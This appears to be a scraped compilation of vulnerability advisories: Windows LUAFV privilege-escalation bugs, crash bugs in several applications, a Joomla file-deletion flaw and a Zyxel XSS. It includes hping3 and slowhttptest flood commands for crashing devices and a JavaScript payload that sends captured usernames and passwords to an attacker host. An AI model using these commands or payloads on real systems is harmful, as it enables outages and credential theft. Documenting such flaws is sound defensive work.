The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492). Just Execute the following script in kali which could crash the devices: hping3 -V -c 10000 -S -w 64 --flood --rand-source $url and slowhttptest -H -R -c 10000 -l 600 -u $url
The LUAFV driver has a race condition in the LuafvPostReadWrite callback if delay virtualization has occurred during a read leading to the SECTION_OBJECT_POINTERS value being reset to the underlying file resulting in EoP. When a IRP_MJ_READ request is issued to a delay virtualized file the filter driver first calls LuafvPreRedirectWithCallback which determines if the file is virtualized, it then sets the underlying, read-only file as the target file object for the filter processing as well as storing the file object in the completion context. When the read operation completes the LuafvPostReadWrite method is called which will inspect the completion context and copy out the file position and the SECTION_OBJECT_POINTERS value. As there’s no locking in place at this point if the file delay virtualization is completed between the call to LuafvPreRedirectWithCallback and LuafvPostReadWrite then the SECTION_OBJECT_POINTERS and cache from the read-only file is used to overwrite the top-level “fake” file object, even though LuafvPerformDelayedVirtualization would have changed them to the new read-write virtual store file. By exploiting this race it’s possible to map the “real” file read-write which allows you to modify the data (you can probably also just write to the underlying file as well). The trick to exploiting this bug is winning the race. One bodge is to just issue a large number of reads to the file and hope that the race is won, however this is unreliable and can take a long time.
The LUAFV driver can confuse the cache and memory manager to replace the contents of privileged file leading to EoP. When using delayed virtualization the driver allows mapping the original file read-only (as a data section or image section) without automatically creating the file in the virtual store. This trick is achieved by copying the real file’s SECTION_OBJECT_POINTERS (SOP) pointer from the file object opened in LuafvDelayOrVirtualizeFile to the top-level “virtual” file object. When creating a new section for a file object the kernel calls MiCreateImageOrDataSection. After checking some parameters it calls MiCallCreateSectionFilters. This is important for virtualization as this results in calling LuafvPreAcquireForSectionSynchronization in the LUAFV driver. If that function detects that the caller is trying to map the section writable then LuafvPreWrite is called which will complete the delayed virtualization process, and will update the SOP pointer of the “virtual” file to the newly created backing file. If the file is not being mapped writable then the LUAFV driver leaves the SOP pointing to the “real” file. MiCreateImageOrDataSection then checks whether the SOP::DataSectionObject CONTROLLING_SECTION_IS_WRITABLE flag is set. If it is then the function will call MiCreateDataFileMap. This function will call MiCreateDataFileMapObject to create a new data file map object. This object is then used to create a new section object. The problem is that the SOP pointer of the “virtual” file object is still pointing to the “real” file. This means that the CONTROLLING_SECTION_IS_WRITABLE flag is set, and MiCreateDataFileMapObject will create a new data file map object for the “real” file. This means that the new section object created will be backed by the “real” file, and not the “virtual” file. This means that an attacker can create a section object backed by a privileged file, and then write to it.
When a caller creates the virtualized file handle the process token is checked for VirtualizationEnabled. If the flag is set and the file create request meets all the criteria for delayed virtualization the driver collates all the necessary information such as the virtual store location for the resulting file if it needs to be copied and stores it in the file object’s context. When a caller performs an operation on the file which is considered a write action, such as writing or issuing any FsControl request then the method LuafvPreWrite is called which will call LuafvPerformDelayedVirtualization. This results in the store file being created and the contents of the original file copied into the new store file before assigning the new file to the original “fake” file object so that the user can continue to use the file. The vulnerability occurs during LuafvPerformDelayedVirtualization. The driver doesn’t take into account the possibility that the virtualized file handle has been duplicated to a new process, specifically one which runs at higher privileges.
The LUAFV is an enabled by default file system filter driver introduced in Windows Vista to support old applications which write to administrative locations such a System32 by virtualizing file access when certain criteria are met. The initial criteria is the process’ token needs to have the VirtualizationEnabled flag set to TRUE. This is done automatically for certain process types for app-compat but can be changed through NtSetInformationToken as long as the VirtualizationAllowed flag is also TRUE. This is the case for all normal users, even on Windows 10 1809. Outside of the token enable flag the file being opened must also meet a set of criteria: 1) The file being opened is in one of a number of protected locations. 2) The file can’t be owned by TrustedInstaller, but must have an ACE which grants the administrator full access. 3) The file name must not have one of a number of banned extensions, such as .exe. 4) The caller must be denied one of a set of write accesses when opening the file. If the file is virtualized a copy of the real file or directory is placed in the user’s VirtualStore inside %LOCALAPPDATA%, however for performance reasons (presumably) the driver won’t always do the copy immediately. If a caller’s file creation request meets the four criteria for a file which already exists, but a copy does not currently exist in the VirtualStore then the driver enables Delayed Virtualization on the file. This results in the file being opened with the requested access rights with the original file opened with read only access. The problem is that the driver reuses the file’s create request DesiredAccess parameter, which can include MAXIMUM_ACCESS, when virtualizing a file.
AdminExpress 1.2.5 is vulnerable to a denial of service attack. To exploit the vulnerability, an attacker must click the 'System Compare' button, paste a payload of 5000 'A' characters into the 'Folder Path' field, and click the scales icon on the right side of the 'Folder Path' field.
A vulnerability in Joomla Core (1.5.0 through 3.9.4) allows an authenticated user to traverse directories and delete arbitrary files. This is due to the lack of input validation in the media manager component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. Successful exploitation of this vulnerability could allow an attacker to delete arbitrary files on the vulnerable system.
PCHelpWareV2 1.0.0.5 is vulnerable to a denial of service attack when a maliciously crafted string is sent to the 'Group' field. When the 'Ok' button is clicked, the application will crash.
PCHelpWareV2 1.0.0.5 is vulnerable to a denial of service attack when a specially crafted BMP image is used. When the 'Create SC' button is clicked, the application crashes.
Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the mp_idx parameter on weblogin.cgi and webauth_relogin.cgi. Host a malicious file JavaScript file named 'z', or any other single character, locally. The contents of 'z' for the following example are: $('button').click(function() { $.get('//$LHOST', { username: $('input:text').val(), password: $('input:password').val(), host: location.hostname}); }); Close the mp_idx variable with '; and Use the getScript functionality of jQuery to include the malicious file.
Services By CQR